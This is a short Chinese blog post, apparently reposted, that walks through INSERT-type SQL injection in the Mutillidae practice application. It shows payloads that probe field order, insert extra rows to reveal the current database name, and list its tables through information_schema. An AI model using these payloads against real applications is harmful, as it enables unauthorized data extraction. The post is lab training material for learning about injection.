博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
mutillidae之Insert型注入
阅读量:5233 次
发布时间:2019-06-14

本文共 545 字,大约阅读时间需要 1 分钟。

A1:Insert型注入

1、输入内容,确定内容输出位置,确定插入字段顺序

输入test')-- -,页面报错,可知test并非最后一个字段,继续尝试test','123'),页面返回正常,确定test是倒数第二个字段,,

2、test后构造第三个字段来尝试爆数据库数据

test',(select database()))-- -,结果发现第三个字段比较特殊,我们输入的数据库信息都会被替代为全0的日期格式,,,

3、利用mysql插入语句的特殊性,即一次可以插入多行数据

同时插入两行数据(爆当前数据库):test','123'),('anonymous',(select database()),'123') -- -

4、爆当前数据库中的所有表

test','123'),('anonymous',(select group_concat(table_name) from information_schema.tables where table_schema=database()),'123') -- -

5、脖子有点疼,,,,爆字段,爆值就不一一进行了,,

 

转载于:https://www.cnblogs.com/peterpan0707007/p/7482258.html

你可能感兴趣的文章
MySql优化相关概念的理解笔记
查看>>
sql索引影响数据存储位置的示例
查看>>
数据库解决方案
查看>>
erlang一些参考资源
查看>>
构建之法阅读笔记06
查看>>
sql server日期时间转字符串
查看>>
备份U盘分区表,未雨绸缪
查看>>
Win32k(3) R0 to R3,键盘鼠标输入
查看>>
numpy之meshgrid和where
查看>>
数据库基础
查看>>
ASP.NET MVC 3.0(十三): MVC 3.0 防止跨站点请求伪造 (CSRF) 攻击
查看>>
Ubuntu 16.04安装Shell管理工具PAC Manager
查看>>
在打开vs解决方案时,怎样让所以打开的项目自动折叠
查看>>
Javascript字节转换
查看>>
python django初识ajax
查看>>
在Windows下安装pip
查看>>
开博第二篇:记一个利用JavaScript,编写PS脚本,开发图片量产工具
查看>>
mybatis example 使用AND 和OR 联合查询
查看>>
计算机网络硬件之调制解调器(猫)
查看>>
抽象工厂模式 The Abstract Factory Pattern
查看>>